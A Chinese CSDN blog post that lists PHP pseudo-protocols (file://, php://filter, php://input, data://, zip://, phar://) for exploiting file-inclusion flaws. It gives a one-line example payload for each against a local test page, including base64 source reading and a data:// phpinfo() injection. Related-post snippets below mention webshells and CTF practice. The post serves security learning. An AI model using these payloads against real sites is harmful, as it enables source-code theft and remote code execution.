文件包含PHP伪协议利用方法

最新推荐文章于 2024-10-05 08:45:32 发布
最新推荐文章于 2024-10-05 08:45:32 发布
阅读量267 收藏 3
点赞数 8
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75036923/article/details/141895123
版权

1.file://协议

使⽤: file:// ⽂件的绝对路径和⽂件名

1.php?cmd=file://E:\yingyun\phpstudy_pro\WWW\1.txt

2.php://filter协议

⽤途:常⽤于读取⽂件 / 源码

?cmd=php://filter/read=convert.base64-encode/resource=1.txt

 

3.php://input协议 

1.php?cmd=php://input抓包

 放行访问

4.data:// 协议

⽤途:数据( RFC2397 )

1.php?cmd=data:text/plain,<?php phpinfo();?>

5.zip://协议 

⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)

1.php?cmd=zip://1.zip%231.txt

 

 6.phar://协议

⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)

1.php?cmd=phar://1.zip/1.txt

 

 

一身傲骨@
关注
php伪协议 文件包含,文件包含漏洞(伪协议利用
weixin_33166692的博客
03-30 1051
实验环境1.已经配置好的WEB服务器2.文件包含页面include.php:文件包含phpinfo(); //一些伪协议的使用需要关注 allow_url_include 和 allow_url_fopen的状态include($_GET['f']);?>3.伪协议利用file伪协议,通过这个协议可以对系统中的文件进行包含,不过一定要是绝对路径1-1php伪协议,有两种类型 input 和 ...
php伪协议漏洞_php伪协议利用文件包含漏洞
weixin_36284062的博客
01-17 482
php支持多种封装协议,这些协议常被CTF出题中与文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy中的设置为5.4.45版本,设置allow_url_fopen和allow_url_include都为On.index.phpindex.php同级目录下有mytest001.txt ,mytest002.txt ,mytest003.zip(其中包含mytest...
文件包含PHP伪协议利用方法 本地复现
2301_82061181的博客
09-03 603
cmd=php://input利用burp抓包。步骤二:创建123.php文件输入一句话木马。less-3 php://input协议。php.ini ⾥有两个重要的参数。php://filter协议。创建2.txt文件进行压缩。步骤三:创建1.php
文件包含漏洞& 文件伪协议利用
永远都没有了
09-11 1798
可能你会问,为什么不是php后缀名而是txt格式,因为我尝试过了,如果是使用的是php格式,那么服务端访问的时候不仅不需要解析,而且只是单纯的访问我的php代码,执行的是我自己的脚本,而不是服务器。就有题目所说是远程包含漏洞,我也懒得测试了,可以发现输入百度链接的时候直接跳转,那么我们可以尝试构造一句话木马搭建在本地的服务,让文件包含解析到攻击者的文本文件而成功的触发到让脚本代码得到解析。我在测试的时候忘记了自己的网站服务是搭建在D盘里,而我的文件是在E盘所以我以为是我的文件包含代码写错了。
文件包含漏洞PHP伪协议利用方法
2401_82451607的博客
09-03 541
文件包含php伪协议的使用方法
PHP文件包含——伪协议
qq_52072846的博客
02-28 2358
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文 件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以 上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建555.txt,内容为 压缩,压缩后在浏览器访问 php://inp..
文件包含时涉及PHP伪协议总结
qq_43256965的博客
05-14 1318
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
php伪协议利用文件包含漏洞
热门推荐
zwish的信安之路
08-03 1万+
php支持多种封装协议,这些协议常被CTF出题中与文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy中的设置为5.4.45版本, 设置allow_url_fopen和allow_url_include都为On. index.php index.php同级目录下有mytest001.txt , mytest002.txt , mytest00...
php伪协议文件包含修复,文件包含漏洞和PHP伪协议
weixin_39524048的博客
04-08 227
文件包含的漏洞形成文件包含就是代码注入的典型代表,PHP文件包含可以直接执行包含文件的代码,而且包含文件的格式是不受限制的,因此如果我们在包含文件中输入恶意代码,就会导致文件包含漏洞,文件包含漏洞大多可以直接利用获取webshell。文件包含的主要函数:include()include_oncerequire()require_once()区别:相同点:include和require 都能把另外...
php伪协议.pdfphp伪协议.pdfphp伪协议.pdf
02-24
### PHP 伪协议详解 #### 一、概览 PHP 伪协议是一种特殊的 URL 格式,用于在 PHP 代码中执行特定的操作。这些伪协议主要用于处理文件读取、网络请求以及数据处理等方面。理解并恰当地使用 PHP 伪协议对于开发安全...
php伪协议读取目录,PHP文件包含,文件读取的利用思路,以及配合伪协议的trick...
weixin_31178795的博客
03-28 1364
PHP文件包含函数有两类,分三种:12file_get_contents()include()/include_once() require/require_once()第一种用于获取文件的数据,第二种用于包含并执行代码与读取文件两种功能php写文件的函数1file_put_contents()基本的思路就是用来写shell吧,不过会有各种限制,但是结合伪协议就可以简单绕过了file_get_...
php伪协议漏洞_include(文件包含漏洞,php伪协议)
weixin_39935257的博客
01-17 1101
点击tips查看元素,也并没有有用的信息,联想到题目,include想起了文件包含漏洞。构造payload?file=/../../../../../../flag.php没有返回东西。看完wq学到了一个新姿势:php伪代码构造payload?file=php://filter/read=convert.base64-encode/resource=flag.php使用 "php://filter...
PHP安装后Apache无法运行的问题
Bingyeshinvwang的博客
10-01 766
php安装之后,修改httpd.conf无法运行Apache的解决方案
Thinkphp/Laravel基于vue的少数民族民歌网络图书馆管理系统
abo2022的博客
09-30 1352
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,并且拥有众多的原创功能和特性,为WEB应用开发提供了强有力的支持Laravel非常的简洁并且是开源的,Laravel 是一个具有表现力、优雅语法的 Web 应用程序框架. Laravel 是构建现代全栈 Web 应用程序的最佳选择.
RCE+[伪协议综合]
2302_81328699的博客
10-03 407
伪协议综合
精品WordPress主题/响应式个人博客主题Kratos
最新发布
2403_86698467的博客
10-05 472
主题设计简约友好,并且支持响应式,自适应访问,简seo单大方的主页构造,使得博客能在臃肿杂乱的环境中脱颖而出,Kratos内置主题设置,可设置seo关键字及站点描述页面伪静态,自定义的顶部样式(背景图 ),
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
Simon223的博客
10-04 939
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
php socket客户端
qq_30754685的博客
09-30 435
在软件管理里面安装composer,再在网站管理安装扩展socket。使用的工具为phpstudy。
php利用伪协议和 include 向文件中写数据
09-07
这种方法通常不是最佳实践,因为它可以带来安全风险,比如可能会被用来执行远程文件包含(RFI)攻击。在正常开发中,应当使用更为安全的方法来处理文件读写操作。 一个简单的例子是使用data:伪协议。这个协议可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值